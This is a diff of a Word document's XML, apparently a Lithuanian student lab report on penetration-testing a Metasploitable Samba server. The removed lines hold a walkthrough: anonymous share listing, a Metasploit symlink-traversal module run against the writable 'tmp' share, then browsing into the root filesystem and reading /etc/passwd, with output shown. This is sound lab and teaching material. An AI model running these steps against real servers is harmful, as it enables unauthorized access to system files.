                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -12445,7 +12482,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="3827780" cy="306705"/>
+                            <a:ext cx="1676400" cy="361950"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -12466,59 +12503,60 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3420" w:type="dxa"/>
-            <w:tcBorders>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+            <w:tcW w:w="3240" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
               <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>exploit</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6030" w:type="dxa"/>
-            <w:tcBorders>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>cd etc</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6210" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
               <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
+              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:noProof/>
               </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E1BE0AC" wp14:editId="5E86DF9E">
-                  <wp:extent cx="3827780" cy="1525905"/>
-                  <wp:effectExtent l="0" t="0" r="1270" b="0"/>
-                  <wp:docPr id="37" name="Picture 37"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53640684" wp14:editId="3F5AC84D">
+                  <wp:extent cx="2571750" cy="314325"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+                  <wp:docPr id="48" name="Picture 48"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -12538,7 +12576,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="3827780" cy="1525905"/>
+                            <a:ext cx="2571750" cy="314325"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -12555,40 +12593,40 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="327"/>
+          <w:trHeight w:val="2177"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3420" w:type="dxa"/>
+            <w:tcW w:w="3240" w:type="dxa"/>
             <w:tcBorders>
               <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
               <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
               <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
               <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
             </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>id</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6030" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>more passwd</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6210" w:type="dxa"/>
             <w:tcBorders>
               <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
               <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
@@ -12602,19 +12640,18 @@
               <w:spacing w:after="0"/>
               <w:jc w:val="both"/>
               <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
                 <w:noProof/>
               </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16262B95" wp14:editId="5162BAFC">
-                  <wp:extent cx="3476625" cy="476250"/>
-                  <wp:effectExtent l="0" t="0" r="9525" b="0"/>
-                  <wp:docPr id="38" name="Picture 38"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E81BE25" wp14:editId="12686883">
+                  <wp:extent cx="3937000" cy="549275"/>
+                  <wp:effectExtent l="0" t="0" r="6350" b="3175"/>
+                  <wp:docPr id="49" name="Picture 49"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -12634,7 +12671,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="3476625" cy="476250"/>
+                            <a:ext cx="3937000" cy="549275"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -12647,741 +12684,24 @@
               </w:drawing>
             </w:r>
           </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>Samba, kai sukonfigūruotas priėjimas su rašymo galimybe ir " wide links plačiosios nuorodos" yra leidžiamas (pagal nutylėjimą).  Gali būti naudojamas kaip slaptas priėjimas prie failų, kurie nebuvo skirti dalijimuisi (share). Žemiau pavyzdyje naudojamas Metasploit modulį suteikti prieigą prie šakninės failų sistemos, naudojant anoniminį prisijungimą su įrašymo galimybę.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>root@linux:~#</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> smbclient -L //IP</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>Anonymous login successful</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>        Sharename       Type      Comment</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>        ---------       ----      -------</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>        print$          Disk      Printer Drivers</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">      </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>  tmp             Disk      Mūsų tikslas!</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>        opt             Disk     </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>        IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>        ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>root@linux:~#</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> msfconsole</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>msf &gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> use auxiliary/admin/smb/samba_symlink_traversal</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">msf  auxiliary(samba_symlink_traversal) &gt; </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>set RHOST IP</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">msf  auxiliary(samba_symlink_traversal) &gt; </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>set SMBSHARE tmp</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">msf  auxiliary(samba_symlink_traversal) &gt; </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>exploit</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">msf auxiliary(samba_symlink_traversal) &gt; </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>exit</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>root@linux:~#</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> smbclient //IP/tmp</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>Anonymous login successful</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">smb: \&gt; </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>cd rootfs</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">smb: \rootfs\&gt; </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>cd etc</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">smb: \rootfs\etc\&gt; </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>more passwd</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>root:x:0:0:root:/root:/bin/bash</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>daemon:x:1:1:daemon:/usr/sbin:/bin/sh</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>bin:x:2:2:bin:/bin:/bin/sh</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>[..]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>(galima pateikti darbalaukio atvaizdą)</w:t>
-      </w:r>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblW w:w="0" w:type="auto"/>
-        <w:tblInd w:w="1" w:type="dxa"/>
-        <w:tblLayout w:type="fixed"/>
-        <w:tblCellMar>
-          <w:left w:w="0" w:type="dxa"/>
-          <w:right w:w="0" w:type="dxa"/>
-        </w:tblCellMar>
-        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="3240"/>
-        <w:gridCol w:w="6210"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:trPr>
-          <w:trHeight w:val="368"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3240" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-            </w:tcBorders>
-            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>Atliktas veiksmas</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6210" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-            </w:tcBorders>
-            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>Rezultatas (paslaugos, prievadai)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:trHeight w:val="327"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3240" w:type="dxa"/>
-            <w:tcBorders>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>s</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>mbclient</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>-L //192.168.177.128</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6210" w:type="dxa"/>
-            <w:tcBorders>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:noProof/>
               </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F9EC08F" wp14:editId="284E0432">
-                  <wp:extent cx="3999230" cy="1881505"/>
-                  <wp:effectExtent l="0" t="0" r="1270" b="4445"/>
-                  <wp:docPr id="39" name="Picture 39"/>
